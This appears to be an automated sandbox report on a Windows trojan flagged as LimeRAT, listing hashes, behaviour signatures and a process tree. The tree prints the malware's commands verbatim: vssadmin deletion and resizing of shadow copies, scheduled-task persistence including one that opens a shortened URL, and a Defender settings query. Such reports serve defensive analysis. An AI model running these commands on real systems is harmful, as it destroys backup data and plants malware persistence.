Analysis

  • max time kernel
    96s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-09-2022 18:11

General

  • Target

    HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe

  • Size

    334KB

  • MD5

    23ceb5e125022c67b8c66cacd2d17803

  • SHA1

    a0eec28de7c622645138d598e77c55eb640b7933

  • SHA256

    3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69

  • SHA512

    9124d423455f4bbd9a44225fd988aea8ed8b4ef941b274c9bdfa565992541464c065e51b895f51b0bd1de1c09f377ff2c1c532462ea91f29e2e58a13d77c8c71

  • SSDEEP

    3072:QI/0W1y4RbPNubjn1GwAEoznq1vK7rbKOtoqoO0MdSgZNz:QRky4ebxknq1cmK0ZiN

Malware Config

Signatures

  • Contains code to disable Windows Defender 3 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 17 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Interacts with shadow copies 2 TTPs 12 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
    "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Modifies security service
    • Checks computer location settings
    • Drops desktop.ini file(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2228
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /sc MINUTE /mo 30 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe'"
      2⤵
      • Creates scheduled task(s)
      PID:3928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4852
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin Delete Shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3360
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:4404
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4588
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        3⤵
          PID:208
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3264
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
          3⤵
          • Interacts with shadow copies
          PID:2464
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4768
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:4872
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1268
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:4040
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4224
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:3644
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4948
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:1348
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4908
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:612
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1352
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:2052
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:3088
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4184
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:1408
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c Vssadmin delete shadowstorage /all /quiet
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4608
        • C:\Windows\system32\vssadmin.exe
          Vssadmin delete shadowstorage /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:2920
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:1432
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /C schtasks /create /f /st "21:42" /sc weekly /mo "3" /d "Mon" /tn "PerformRemediation" /tr "'explorer'http://bit.ly/2HKY0b9"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1392
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /st "21:42" /sc weekly /mo "3" /d "Mon" /tn "PerformRemediation" /tr "'explorer'http://bit.ly/2HKY0b9"
          3⤵
          • Creates scheduled task(s)
          PID:2396
      • C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe
        "C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops desktop.ini file(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1096
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /create /f /sc MINUTE /mo 30 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:1256
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1096 -s 1820
          3⤵
          • Program crash
          PID:4548
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4060
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k netsvcs -p
      1⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Enumerates system info in registry
      PID:3692
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -pss -s 452 -p 1096 -ip 1096
      1⤵
        PID:2448

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe

        Filesize

        334KB

        MD5

        23ceb5e125022c67b8c66cacd2d17803

        SHA1

        a0eec28de7c622645138d598e77c55eb640b7933

        SHA256

        3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69

        SHA512

        9124d423455f4bbd9a44225fd988aea8ed8b4ef941b274c9bdfa565992541464c065e51b895f51b0bd1de1c09f377ff2c1c532462ea91f29e2e58a13d77c8c71

      • C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe

        Filesize

        334KB

        MD5

        23ceb5e125022c67b8c66cacd2d17803

        SHA1

        a0eec28de7c622645138d598e77c55eb640b7933

        SHA256

        3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69

        SHA512

        9124d423455f4bbd9a44225fd988aea8ed8b4ef941b274c9bdfa565992541464c065e51b895f51b0bd1de1c09f377ff2c1c532462ea91f29e2e58a13d77c8c71

      • memory/1096-181-0x0000018C440FA000-0x0000018C440FF000-memory.dmp

        Filesize

        20KB

      • memory/1096-178-0x0000018C42DD0000-0x0000018C43150000-memory.dmp

        Filesize

        3.5MB

      • memory/1096-182-0x0000018C42DD0000-0x0000018C43150000-memory.dmp

        Filesize

        3.5MB

      • memory/1096-184-0x0000018C42DD0000-0x0000018C43150000-memory.dmp

        Filesize

        3.5MB

      • memory/1096-172-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

        Filesize

        10.8MB

      • memory/1096-174-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

        Filesize

        10.8MB

      • memory/1096-176-0x0000018C440FA000-0x0000018C440FF000-memory.dmp

        Filesize

        20KB

      • memory/1096-180-0x0000018C42DD0000-0x0000018C43150000-memory.dmp

        Filesize

        3.5MB

      • memory/1096-179-0x0000018C42DD0000-0x0000018C43150000-memory.dmp

        Filesize

        3.5MB

      • memory/1096-183-0x0000018C42DD0000-0x0000018C43150000-memory.dmp

        Filesize

        3.5MB

      • memory/1096-185-0x0000018C42DD0000-0x0000018C43150000-memory.dmp

        Filesize

        3.5MB

      • memory/1096-177-0x0000018C42DD0000-0x0000018C43150000-memory.dmp

        Filesize

        3.5MB

      • memory/2228-133-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

        Filesize

        10.8MB

      • memory/2228-132-0x000001D31AC20000-0x000001D31AC78000-memory.dmp

        Filesize

        352KB

      • memory/2228-171-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

        Filesize

        10.8MB

      • memory/2228-135-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

        Filesize

        10.8MB

      • memory/4852-139-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

        Filesize

        10.8MB

      • memory/4852-138-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmp

        Filesize

        10.8MB

      • memory/4852-137-0x00000227D1710000-0x00000227D1732000-memory.dmp

        Filesize

        136KB